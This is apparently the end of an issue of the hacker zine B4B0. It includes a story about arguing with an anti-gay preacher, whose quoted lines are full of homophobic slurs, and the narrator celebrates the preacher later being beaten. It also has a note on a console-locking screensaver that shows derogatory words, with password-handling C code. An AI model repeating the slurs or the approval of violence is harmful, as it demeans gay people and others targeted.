So the sermon went, the usual church shit, yahdayahdayahda... the hymns, the prayers and all that... until about 45 minutes later Sam woke me from deep slumber when Fred started preaching the evils of homosexuality. People started asking questions as he spoke, and he answered quite logically. The man was a lawyer, I thought; most of them, like my dad, have a knack for conveying one side of the reasoning and making it all encompassing. So I held up my hand, and was asked to speak.

Me : "Reverend Felps, I am new here, in this church and in this country. I don't quite understand why you seem to direct all your problems at one social group who a) pay more taxes per capita than most other minorities, b) are probably more educated as well? How can any group contributing to the government and society in such a way be considered harmful?"

He muttered something ridiculous like telling me to get a haircut, which was when Sam (he's got hair down to his ass... I learned never ever to talk any shit about long hair around him) stood up and started his rhetoric :)...

Sam : "Mr Felps, I would like to know why you are so prolific about your projections onto gay people.
It is quite entertaining, humorous even, that you would choose to broadcast your inner id feelings towards homosexuals on national television."

Most people got the joke, and gave us the evilest look they could muster. I must say most people would have backed down and shut up at this point, but Sam, oh Sam... what can I say... Anyways, Mr Felps professed that he did not know what Sam meant.

Sam : "Mr Felps, would you like to answer my friend's question as to why you are targeting one of the more successful minority groups of this country?"

Felps : "I happen to think their lifestyle is a harmful influence on our youth in this country. I also happen to perceive that this country is being overrun by faggots. Is there no more decency in this country?" (applause by his crowd)

"Mr Felps, as I recall correctly, American society is firmly capitalist, meaning that each individual's success is based upon one's wealth. How would the lifestyle of a homosexual, one of success, good education and wealth, be questionable to the youth?"

Felps : "As *I* recall correctly, American society is firmly CHRISTIAN based. It is because of non-believers such as these homosexuals that the youth today stem from the faith. That is why I am opposed to them."

Me : "But was it not the New Testament itself that states that we should love our neighbours?"

Felps : "Ummmmm... Are you familiar with the book of Sodom?"

Sam : "Yes I am, and I am familiar with this line of argument. You would state that the book of Sodom states quite clearly that male-male sexual activities are forbidden and only male-female copulation is deemed allowable by God. You would also state that the bible FIRMLY states that sex is a sacred act of God, and people should not abuse this power. You will also lead into the argument right here that AIDS and other sexually transmitted diseases were the repercussion of these acts."

Felps : "You read my mind son. How would you choose to refute these claims.
I am of course a man bound by faith, so please keep any arguments about the bible's validity to yourself."

Sam : "Okay... Homosexuality has been documented since Roman times. How come AIDS only came around now?"

Felps : "There are other sexually transmitted diseases that God has dispensed in his fury upon this planet. Unfortunately the devil has made the faggot strong in his ways, and they have not been dissuaded."

Me : "How about this? It is nearly medically impossible for lesbians to contract AIDS. If God indeed tried to make AIDS a means of dissuading homosexuality, why are a) more heterosexuals affected? b) why did he leave half the faggots off the list?"

Felps : "God is not fair, he chose to punish the whole of humanity for the crimes of the faggots. I have taken up the task of God to dissuade all of humanity against the ways of faggots. Lesbians are evil too."

One of us : "You still have not answered the questions we posed, could you please answer them now?"

Felps : "I have answered them son. God has other diseases to weaken his enemy. AIDS is only one piece in his arsenal. Gonorrhea, syphilis, etc etc all attack sexually indecent men and women in some way or another."

One of us : "Alright fair enough, how about this... If a person is not sexually promiscuous, then it is very unlikely that he or she gets infected with anything, correct? Is it possible that your God wants to dissuade his people from promiscuous sex? Has he not made a distinction between acts of love and acts of passion before?"

Felps : "God has made it very clear that sexual acts outside of wedlock are forbidden."

Me : "Mr Felps, where exactly in the bible does it say that wedlock has to be between a man and a woman?"

Felps : (stammers something unintelligible... me and Sam exchange evil grinning looks...)

Me : "As a matter of fact, where in the bible does it define the man and the woman entity, biologically and psychologically?
If this premise is not made, then all your arguments against homosexuality are open to question."

Someone in the crowd : "How is that?"

Sam : "Well it is quite easy to see that a gay couple can be enacting both the male and female parts of the relationship. With legislation allowing homosexuals to marry in Hawaii it is perfectly ethical for gays to be within the bounds of Christianity and still copulate. No?"

Someone in the crowd : (something like "you fags" or "faggot loving liberals"... something dumb like that... think it was Ben.)

Someone else in the crowd : (Leave if you don't like what we have to say, we don't like you anyways.)

Sam : "We are merely discussing the rhetoric in the bible, I personally made no attacks on the validity of the good book, neither did my friend here."

Some bitch in the crowd : "Shut up, you people are full of it as it is!"

Me : "We were merely discussing with the *beloved* reverend the various interpretations of the bible with a fine comb."

We were asked to leave anyway :) In fact, we didn't leave until Sam got the answers to his questions. Sorry to say we were rather discouraged by our journey into the interpretations of the bible. I personally ditched the cross and became a Taoist instead. Oh well... Fred was beaten up in the middle of Kansas City one day when he was picketing somewhere near the Plaza. HEH it was a sight to behold. He's wrong. I am right. HAHA

-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
bsaver overview, by cp4kt
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-

This little program, based on Qytpo's drugz2.c, has been turned into a lovely ncurses screen saver. Nice words, derogatory words, and most importantly, dill monkey words come up -- it's fun for the whole family.

We / I decided to just store the password in this line here:

    static char passwd[] = "dillmonkey";

If you can code just a teeny bit, you can change this to a macro. (A macro doesn't hide it, mind you: either way the string sits in the binary, and `strings bsaver` will show it to anyone who can read the file.)
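An added example, not bsaver.c's code and not cp4kt's: a bounded replacement for the hardcoded passwd[] above that covers the two alternatives the overview goes on to mention, a prompt at each session and a .bsaver file, using the same 20-byte buffer. The names PASSWD_LEN, read_password_line, load_password_file, password_matches and input_from are this example's own, and the inputs fed in from main() are constructed for the demo. The point it adds to the text: a line longer than the buffer is drained and rejected rather than silently truncated, a password file that other users can read is refused, and the comparison takes the same time however many leading characters matched.

```c
/* Added example, not bsaver.c's code: bounded password handling for a
 * console locker. Replaces the hardcoded passwd[] with a read from a stream
 * (the prompt, or a ~/.bsaver file) into the same 20-byte buffer, rejects a
 * line that does not fit instead of truncating it, refuses a password file
 * other users can read, and compares without leaking the matching prefix.
 * PASSWD_LEN, read_password_line, load_password_file, password_matches and
 * input_from are this example's names, not bsaver's. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

#define PASSWD_LEN 20   /* bsaver's buffer size: 19 characters plus the NUL */

/* Read one line from fp into buf[n], dropping the trailing newline.
 * Returns 0 on success, -1 on EOF or an empty line, -2 if the line did not
 * fit: the rest of the line is drained and buf is wiped, so a truncated
 * prefix is never accepted as the password. */
int read_password_line(FILE *fp, char *buf, size_t n)
{
    if (n < 2 || fgets(buf, (int)n, fp) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
        return len == 0 ? -1 : 0;
    }
    /* No newline in the buffer: input ended, the line was exactly n-1
     * characters, or it was longer. One more character tells which. */
    int c = fgetc(fp);
    if (c == EOF || c == '\n')
        return len == 0 ? -1 : 0;
    while (c != '\n' && c != EOF)
        c = fgetc(fp);
    memset(buf, 0, n);
    return -2;
}

/* Load the password from a file such as ~/.bsaver. Returns the codes of
 * read_password_line, -3 if the file is group- or world-accessible (anyone
 * who can read it can unlock the console), -4 if it cannot be opened. */
int load_password_file(const char *path, char *buf, size_t n)
{
    struct stat st;
    if (stat(path, &st) != 0 || !S_ISREG(st.st_mode))
        return -4;
    if (st.st_mode & (S_IRWXG | S_IRWXO))
        return -3;
    FILE *fp = fopen(path, "r");
    if (fp == NULL)
        return -4;
    int rc = read_password_line(fp, buf, n);
    fclose(fp);
    return rc;
}

/* Compare in time that depends only on the stored password's length, so
 * someone at the keyboard cannot time how many leading characters matched. */
int password_matches(const char *stored, const char *entered)
{
    size_t ls = strlen(stored), le = strlen(entered);
    unsigned char diff = (unsigned char)(ls != le);
    for (size_t i = 0; i < ls; i++)
        diff |= (unsigned char)(stored[i] ^ entered[le ? i % le : 0]);
    return diff == 0;
}

/* A stream holding constructed input, standing in for the terminal or a
 * password file; tmpfile() keeps the demo ISO C and offline. */
FILE *input_from(const char *text)
{
    FILE *fp = tmpfile();
    if (fp != NULL) {
        fputs(text, fp);
        rewind(fp);
    }
    return fp;
}

int main(void)
{
    char passwd[PASSWD_LEN];
    FILE *in = input_from("dillmonkey\n");          /* constructed prompt input */
    int rc = read_password_line(in, passwd, sizeof passwd);
    fclose(in);
    printf("read: rc=%d  match: %d\n", rc, password_matches("dillmonkey", passwd));

    in = input_from("this-line-is-longer-than-nineteen-chars\n");
    rc = read_password_line(in, passwd, sizeof passwd);
    fclose(in);
    printf("too long: rc=%d  buffer empty: %d\n", rc, passwd[0] == '\0');
    return 0;
}
```

To check against the login password instead of a string of your own, look the user up with getpwuid(getuid()) (getspnam() on a shadow-password system, which needs root) and compare crypt(entered, hash) with the stored hash, linking with -lcrypt; the read and compare routines above apply unchanged.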
Did I mention teeny? We also thought that perhaps you might want to accept a password by prompting for one at each session. That might be accomplished by:

    static char passwd[20];
    ...
    printf("Enter password to use: ");
    scanf("%19s", passwd);

(That's scanf(), not sscanf(): sscanf() takes the string to parse as its first argument, so sscanf("%20s", passwd) would read the format as input. The width is 19, not 20, because the buffer must also hold the terminating NUL; and %s stops at whitespace, so use fgets() if you want spaces in your password.) But the problem is, if you forget it, you might as well reboot. You can also have it saved in a file, perhaps .bsaver, and fopen() and fgets() from it, but remember the buffer is 20 bytes: pass sizeof(passwd) as the fgets() length and strip the trailing newline, and keep the file mode 0600, since anyone who can read it can unlock your console. You can also merely use the passwd structure (getpwuid() on your own uid, or getspnam() where shadow passwords are in use) and check the entered password against your login password via crypt() etc. Anyways, the code is yours to edit. If there are any problems, mail me at comp4ct@hotmail.com

p.s. don't abuse getch. Hit Enter *ONE TIME* to get a password prompt.

NOTE: If you have any minorities in your office / household, I would not run this program in front of them. It may lock your console, but if they see what's popping up, you could be fired / flogged. But isn't that the b4b0 way?

Good Day,
cp4kt

Special thanks to: Matt Conover (Shok of w00w00) for his great article on console ioctls. The macros used to lock the console were taken from there. Thank you.

-/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/-

Closing up..

WELP, THAT'S IT. Hope you enjoyed this totally k-sp1ff, extraordinarily diverse issue of BABO! Please send many submissions to us for B4B0 8 (submissions@b4b0.org). Comments and questions go to: letters@b4b0.org

Your editor,
ph1x.

######## ######## ######## ## ## ## ## ######## ## ## ######## ## ## ## ## ######## ######## ##